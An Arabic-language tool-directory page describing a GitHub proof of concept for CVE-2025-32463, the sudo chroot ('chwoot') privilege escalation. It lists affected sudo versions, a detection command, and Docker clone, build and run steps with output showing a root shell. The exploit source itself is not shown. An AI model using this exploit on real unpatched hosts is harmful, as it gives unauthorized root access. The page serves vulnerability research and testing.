Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/vpr-labs/cve-2025-32463
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالهروب من الحاويةاستغلال الملفات الثنائية
GitHubvpr-labs/cve-2025-32463

CVE-2025-32463

إعادة تنفيذ بلغة C لـ chwoot PoC

عرض المستودع
5منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بشكل كبير متأثر/منسوخ/مبني على تنسيق مستودع مشابه من pr0v3rbs -- https://github.com/pr0v3rbs/CVE-2025-32463i_chwoot.git هذا هو إعادة تنفيذ بلغة C للتوصيل السريع والتنفيذ والتنظيف من مصدر واحد.

CVE-2025-32463 – إثبات المفهوم لـ sudo chroot ("chwoot")

يوفر هذا المستودع بيئة بسيطة وقابلة للتكرار لإظهار ثغرة CVE‑2025‑32463 لتصعيد الامتيازات في ميزة chroot الخاصة بـ sudo.

  • تم الإبلاغ عن هذه الثغرة بواسطة Rich Mirch (@0xm1rch على X) @ Stratascale.
  • المنشور الأصلي: إعلان ثغرة: تصعيد الامتيازات عبر Sudo chroot
  • NVD: CVE-2025-32463 (CVSS 9.3)

الإصدارات المتأثرة

الإصدارات الضعيفة من sudo 1.9.14 إلى 1.9.17 (جميع المراجعات p) على معظم توزيعات لينكس تتأثر.

صفحات الأمان

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

المحتويات

الملفالغرض
Dockerfileإنشاء صورة Ubuntu 24.04 مع sudo 1.9.16p2 الضعيف وأدوات البناء
sudo‑chwoot.shاستغلال إثبات المفهوم الذي يفتح شل جذر داخل chroot
run.shسكريبت مساعد يبني الصورة (إذا لزم الأمر) ويطلق حاوية الاستغلال

فحص الثغرة السريع

root@kitploit:~
# Vulnerable sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot

اختبار الاستغلال في حاوية Docker

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463

# 2 – build and run Docker image (tagged "vpr-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#

run.sh يمرر --privileged و --rm إلى Docker بحيث تقوم الحاوية بتنظيف نفسها عند الخروج.


التنظيف

قم بإزالة الصورة عند الانتهاء:

root@kitploit:~
docker rmi vpr-chwoot

المرجع

  • ملاحظة ثغرة Stratascale CRU: إعلان ثغرة: تصعيد الامتيازات عبر Sudo chroot
تنزيل الأداة